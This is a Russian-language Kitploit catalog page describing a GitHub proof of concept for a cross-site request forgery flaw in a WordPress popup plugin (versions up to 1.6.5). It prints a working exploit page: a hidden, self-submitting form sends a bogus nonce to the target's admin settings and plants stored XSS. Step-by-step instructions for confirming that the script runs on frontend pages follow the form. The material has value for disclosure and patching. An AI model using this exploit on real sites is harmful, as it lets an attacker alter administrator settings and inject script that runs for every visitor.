Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 — межсайтовая подделка запроса | Kitploit
Инструменты/GitHubGitHub/testardou/cve-2026-65540
Сканеры веб-уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасность
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 — межсайтовая подделка запроса

Репозиторий
14 ч 33 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 — межсайтовая подделка запроса

URL плагина

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Описание

Обработчик настроек плагина содержит логическую ошибку в проверке nonce, что полностью отключает защиту от CSRF. Неаутентифицированный злоумышленник может воспользоваться этим, заставив аутентифицированного администратора посетить вредоносную страницу со скрытой формой, автоматически отправляющей данные, и произвольно изменить настройки плагина. Отправленные значения сохраняются без санитизации и внедряются дословно в блок

POC

  1. Разместите следующую HTML-страницу на отдельном сервере:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. Войдите в WordPress как администратор
  • Посетите вредоносную страницу
  • (Необязательно) Перейдите по адресу http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — убедитесь, что поле Width теперь содержит 500;alert(document.domain)
  • Посетите любую страницу фронтенда — alert(document.domain) выполнится в браузере, подтверждая хранимый XSS
  • Скачать инструмент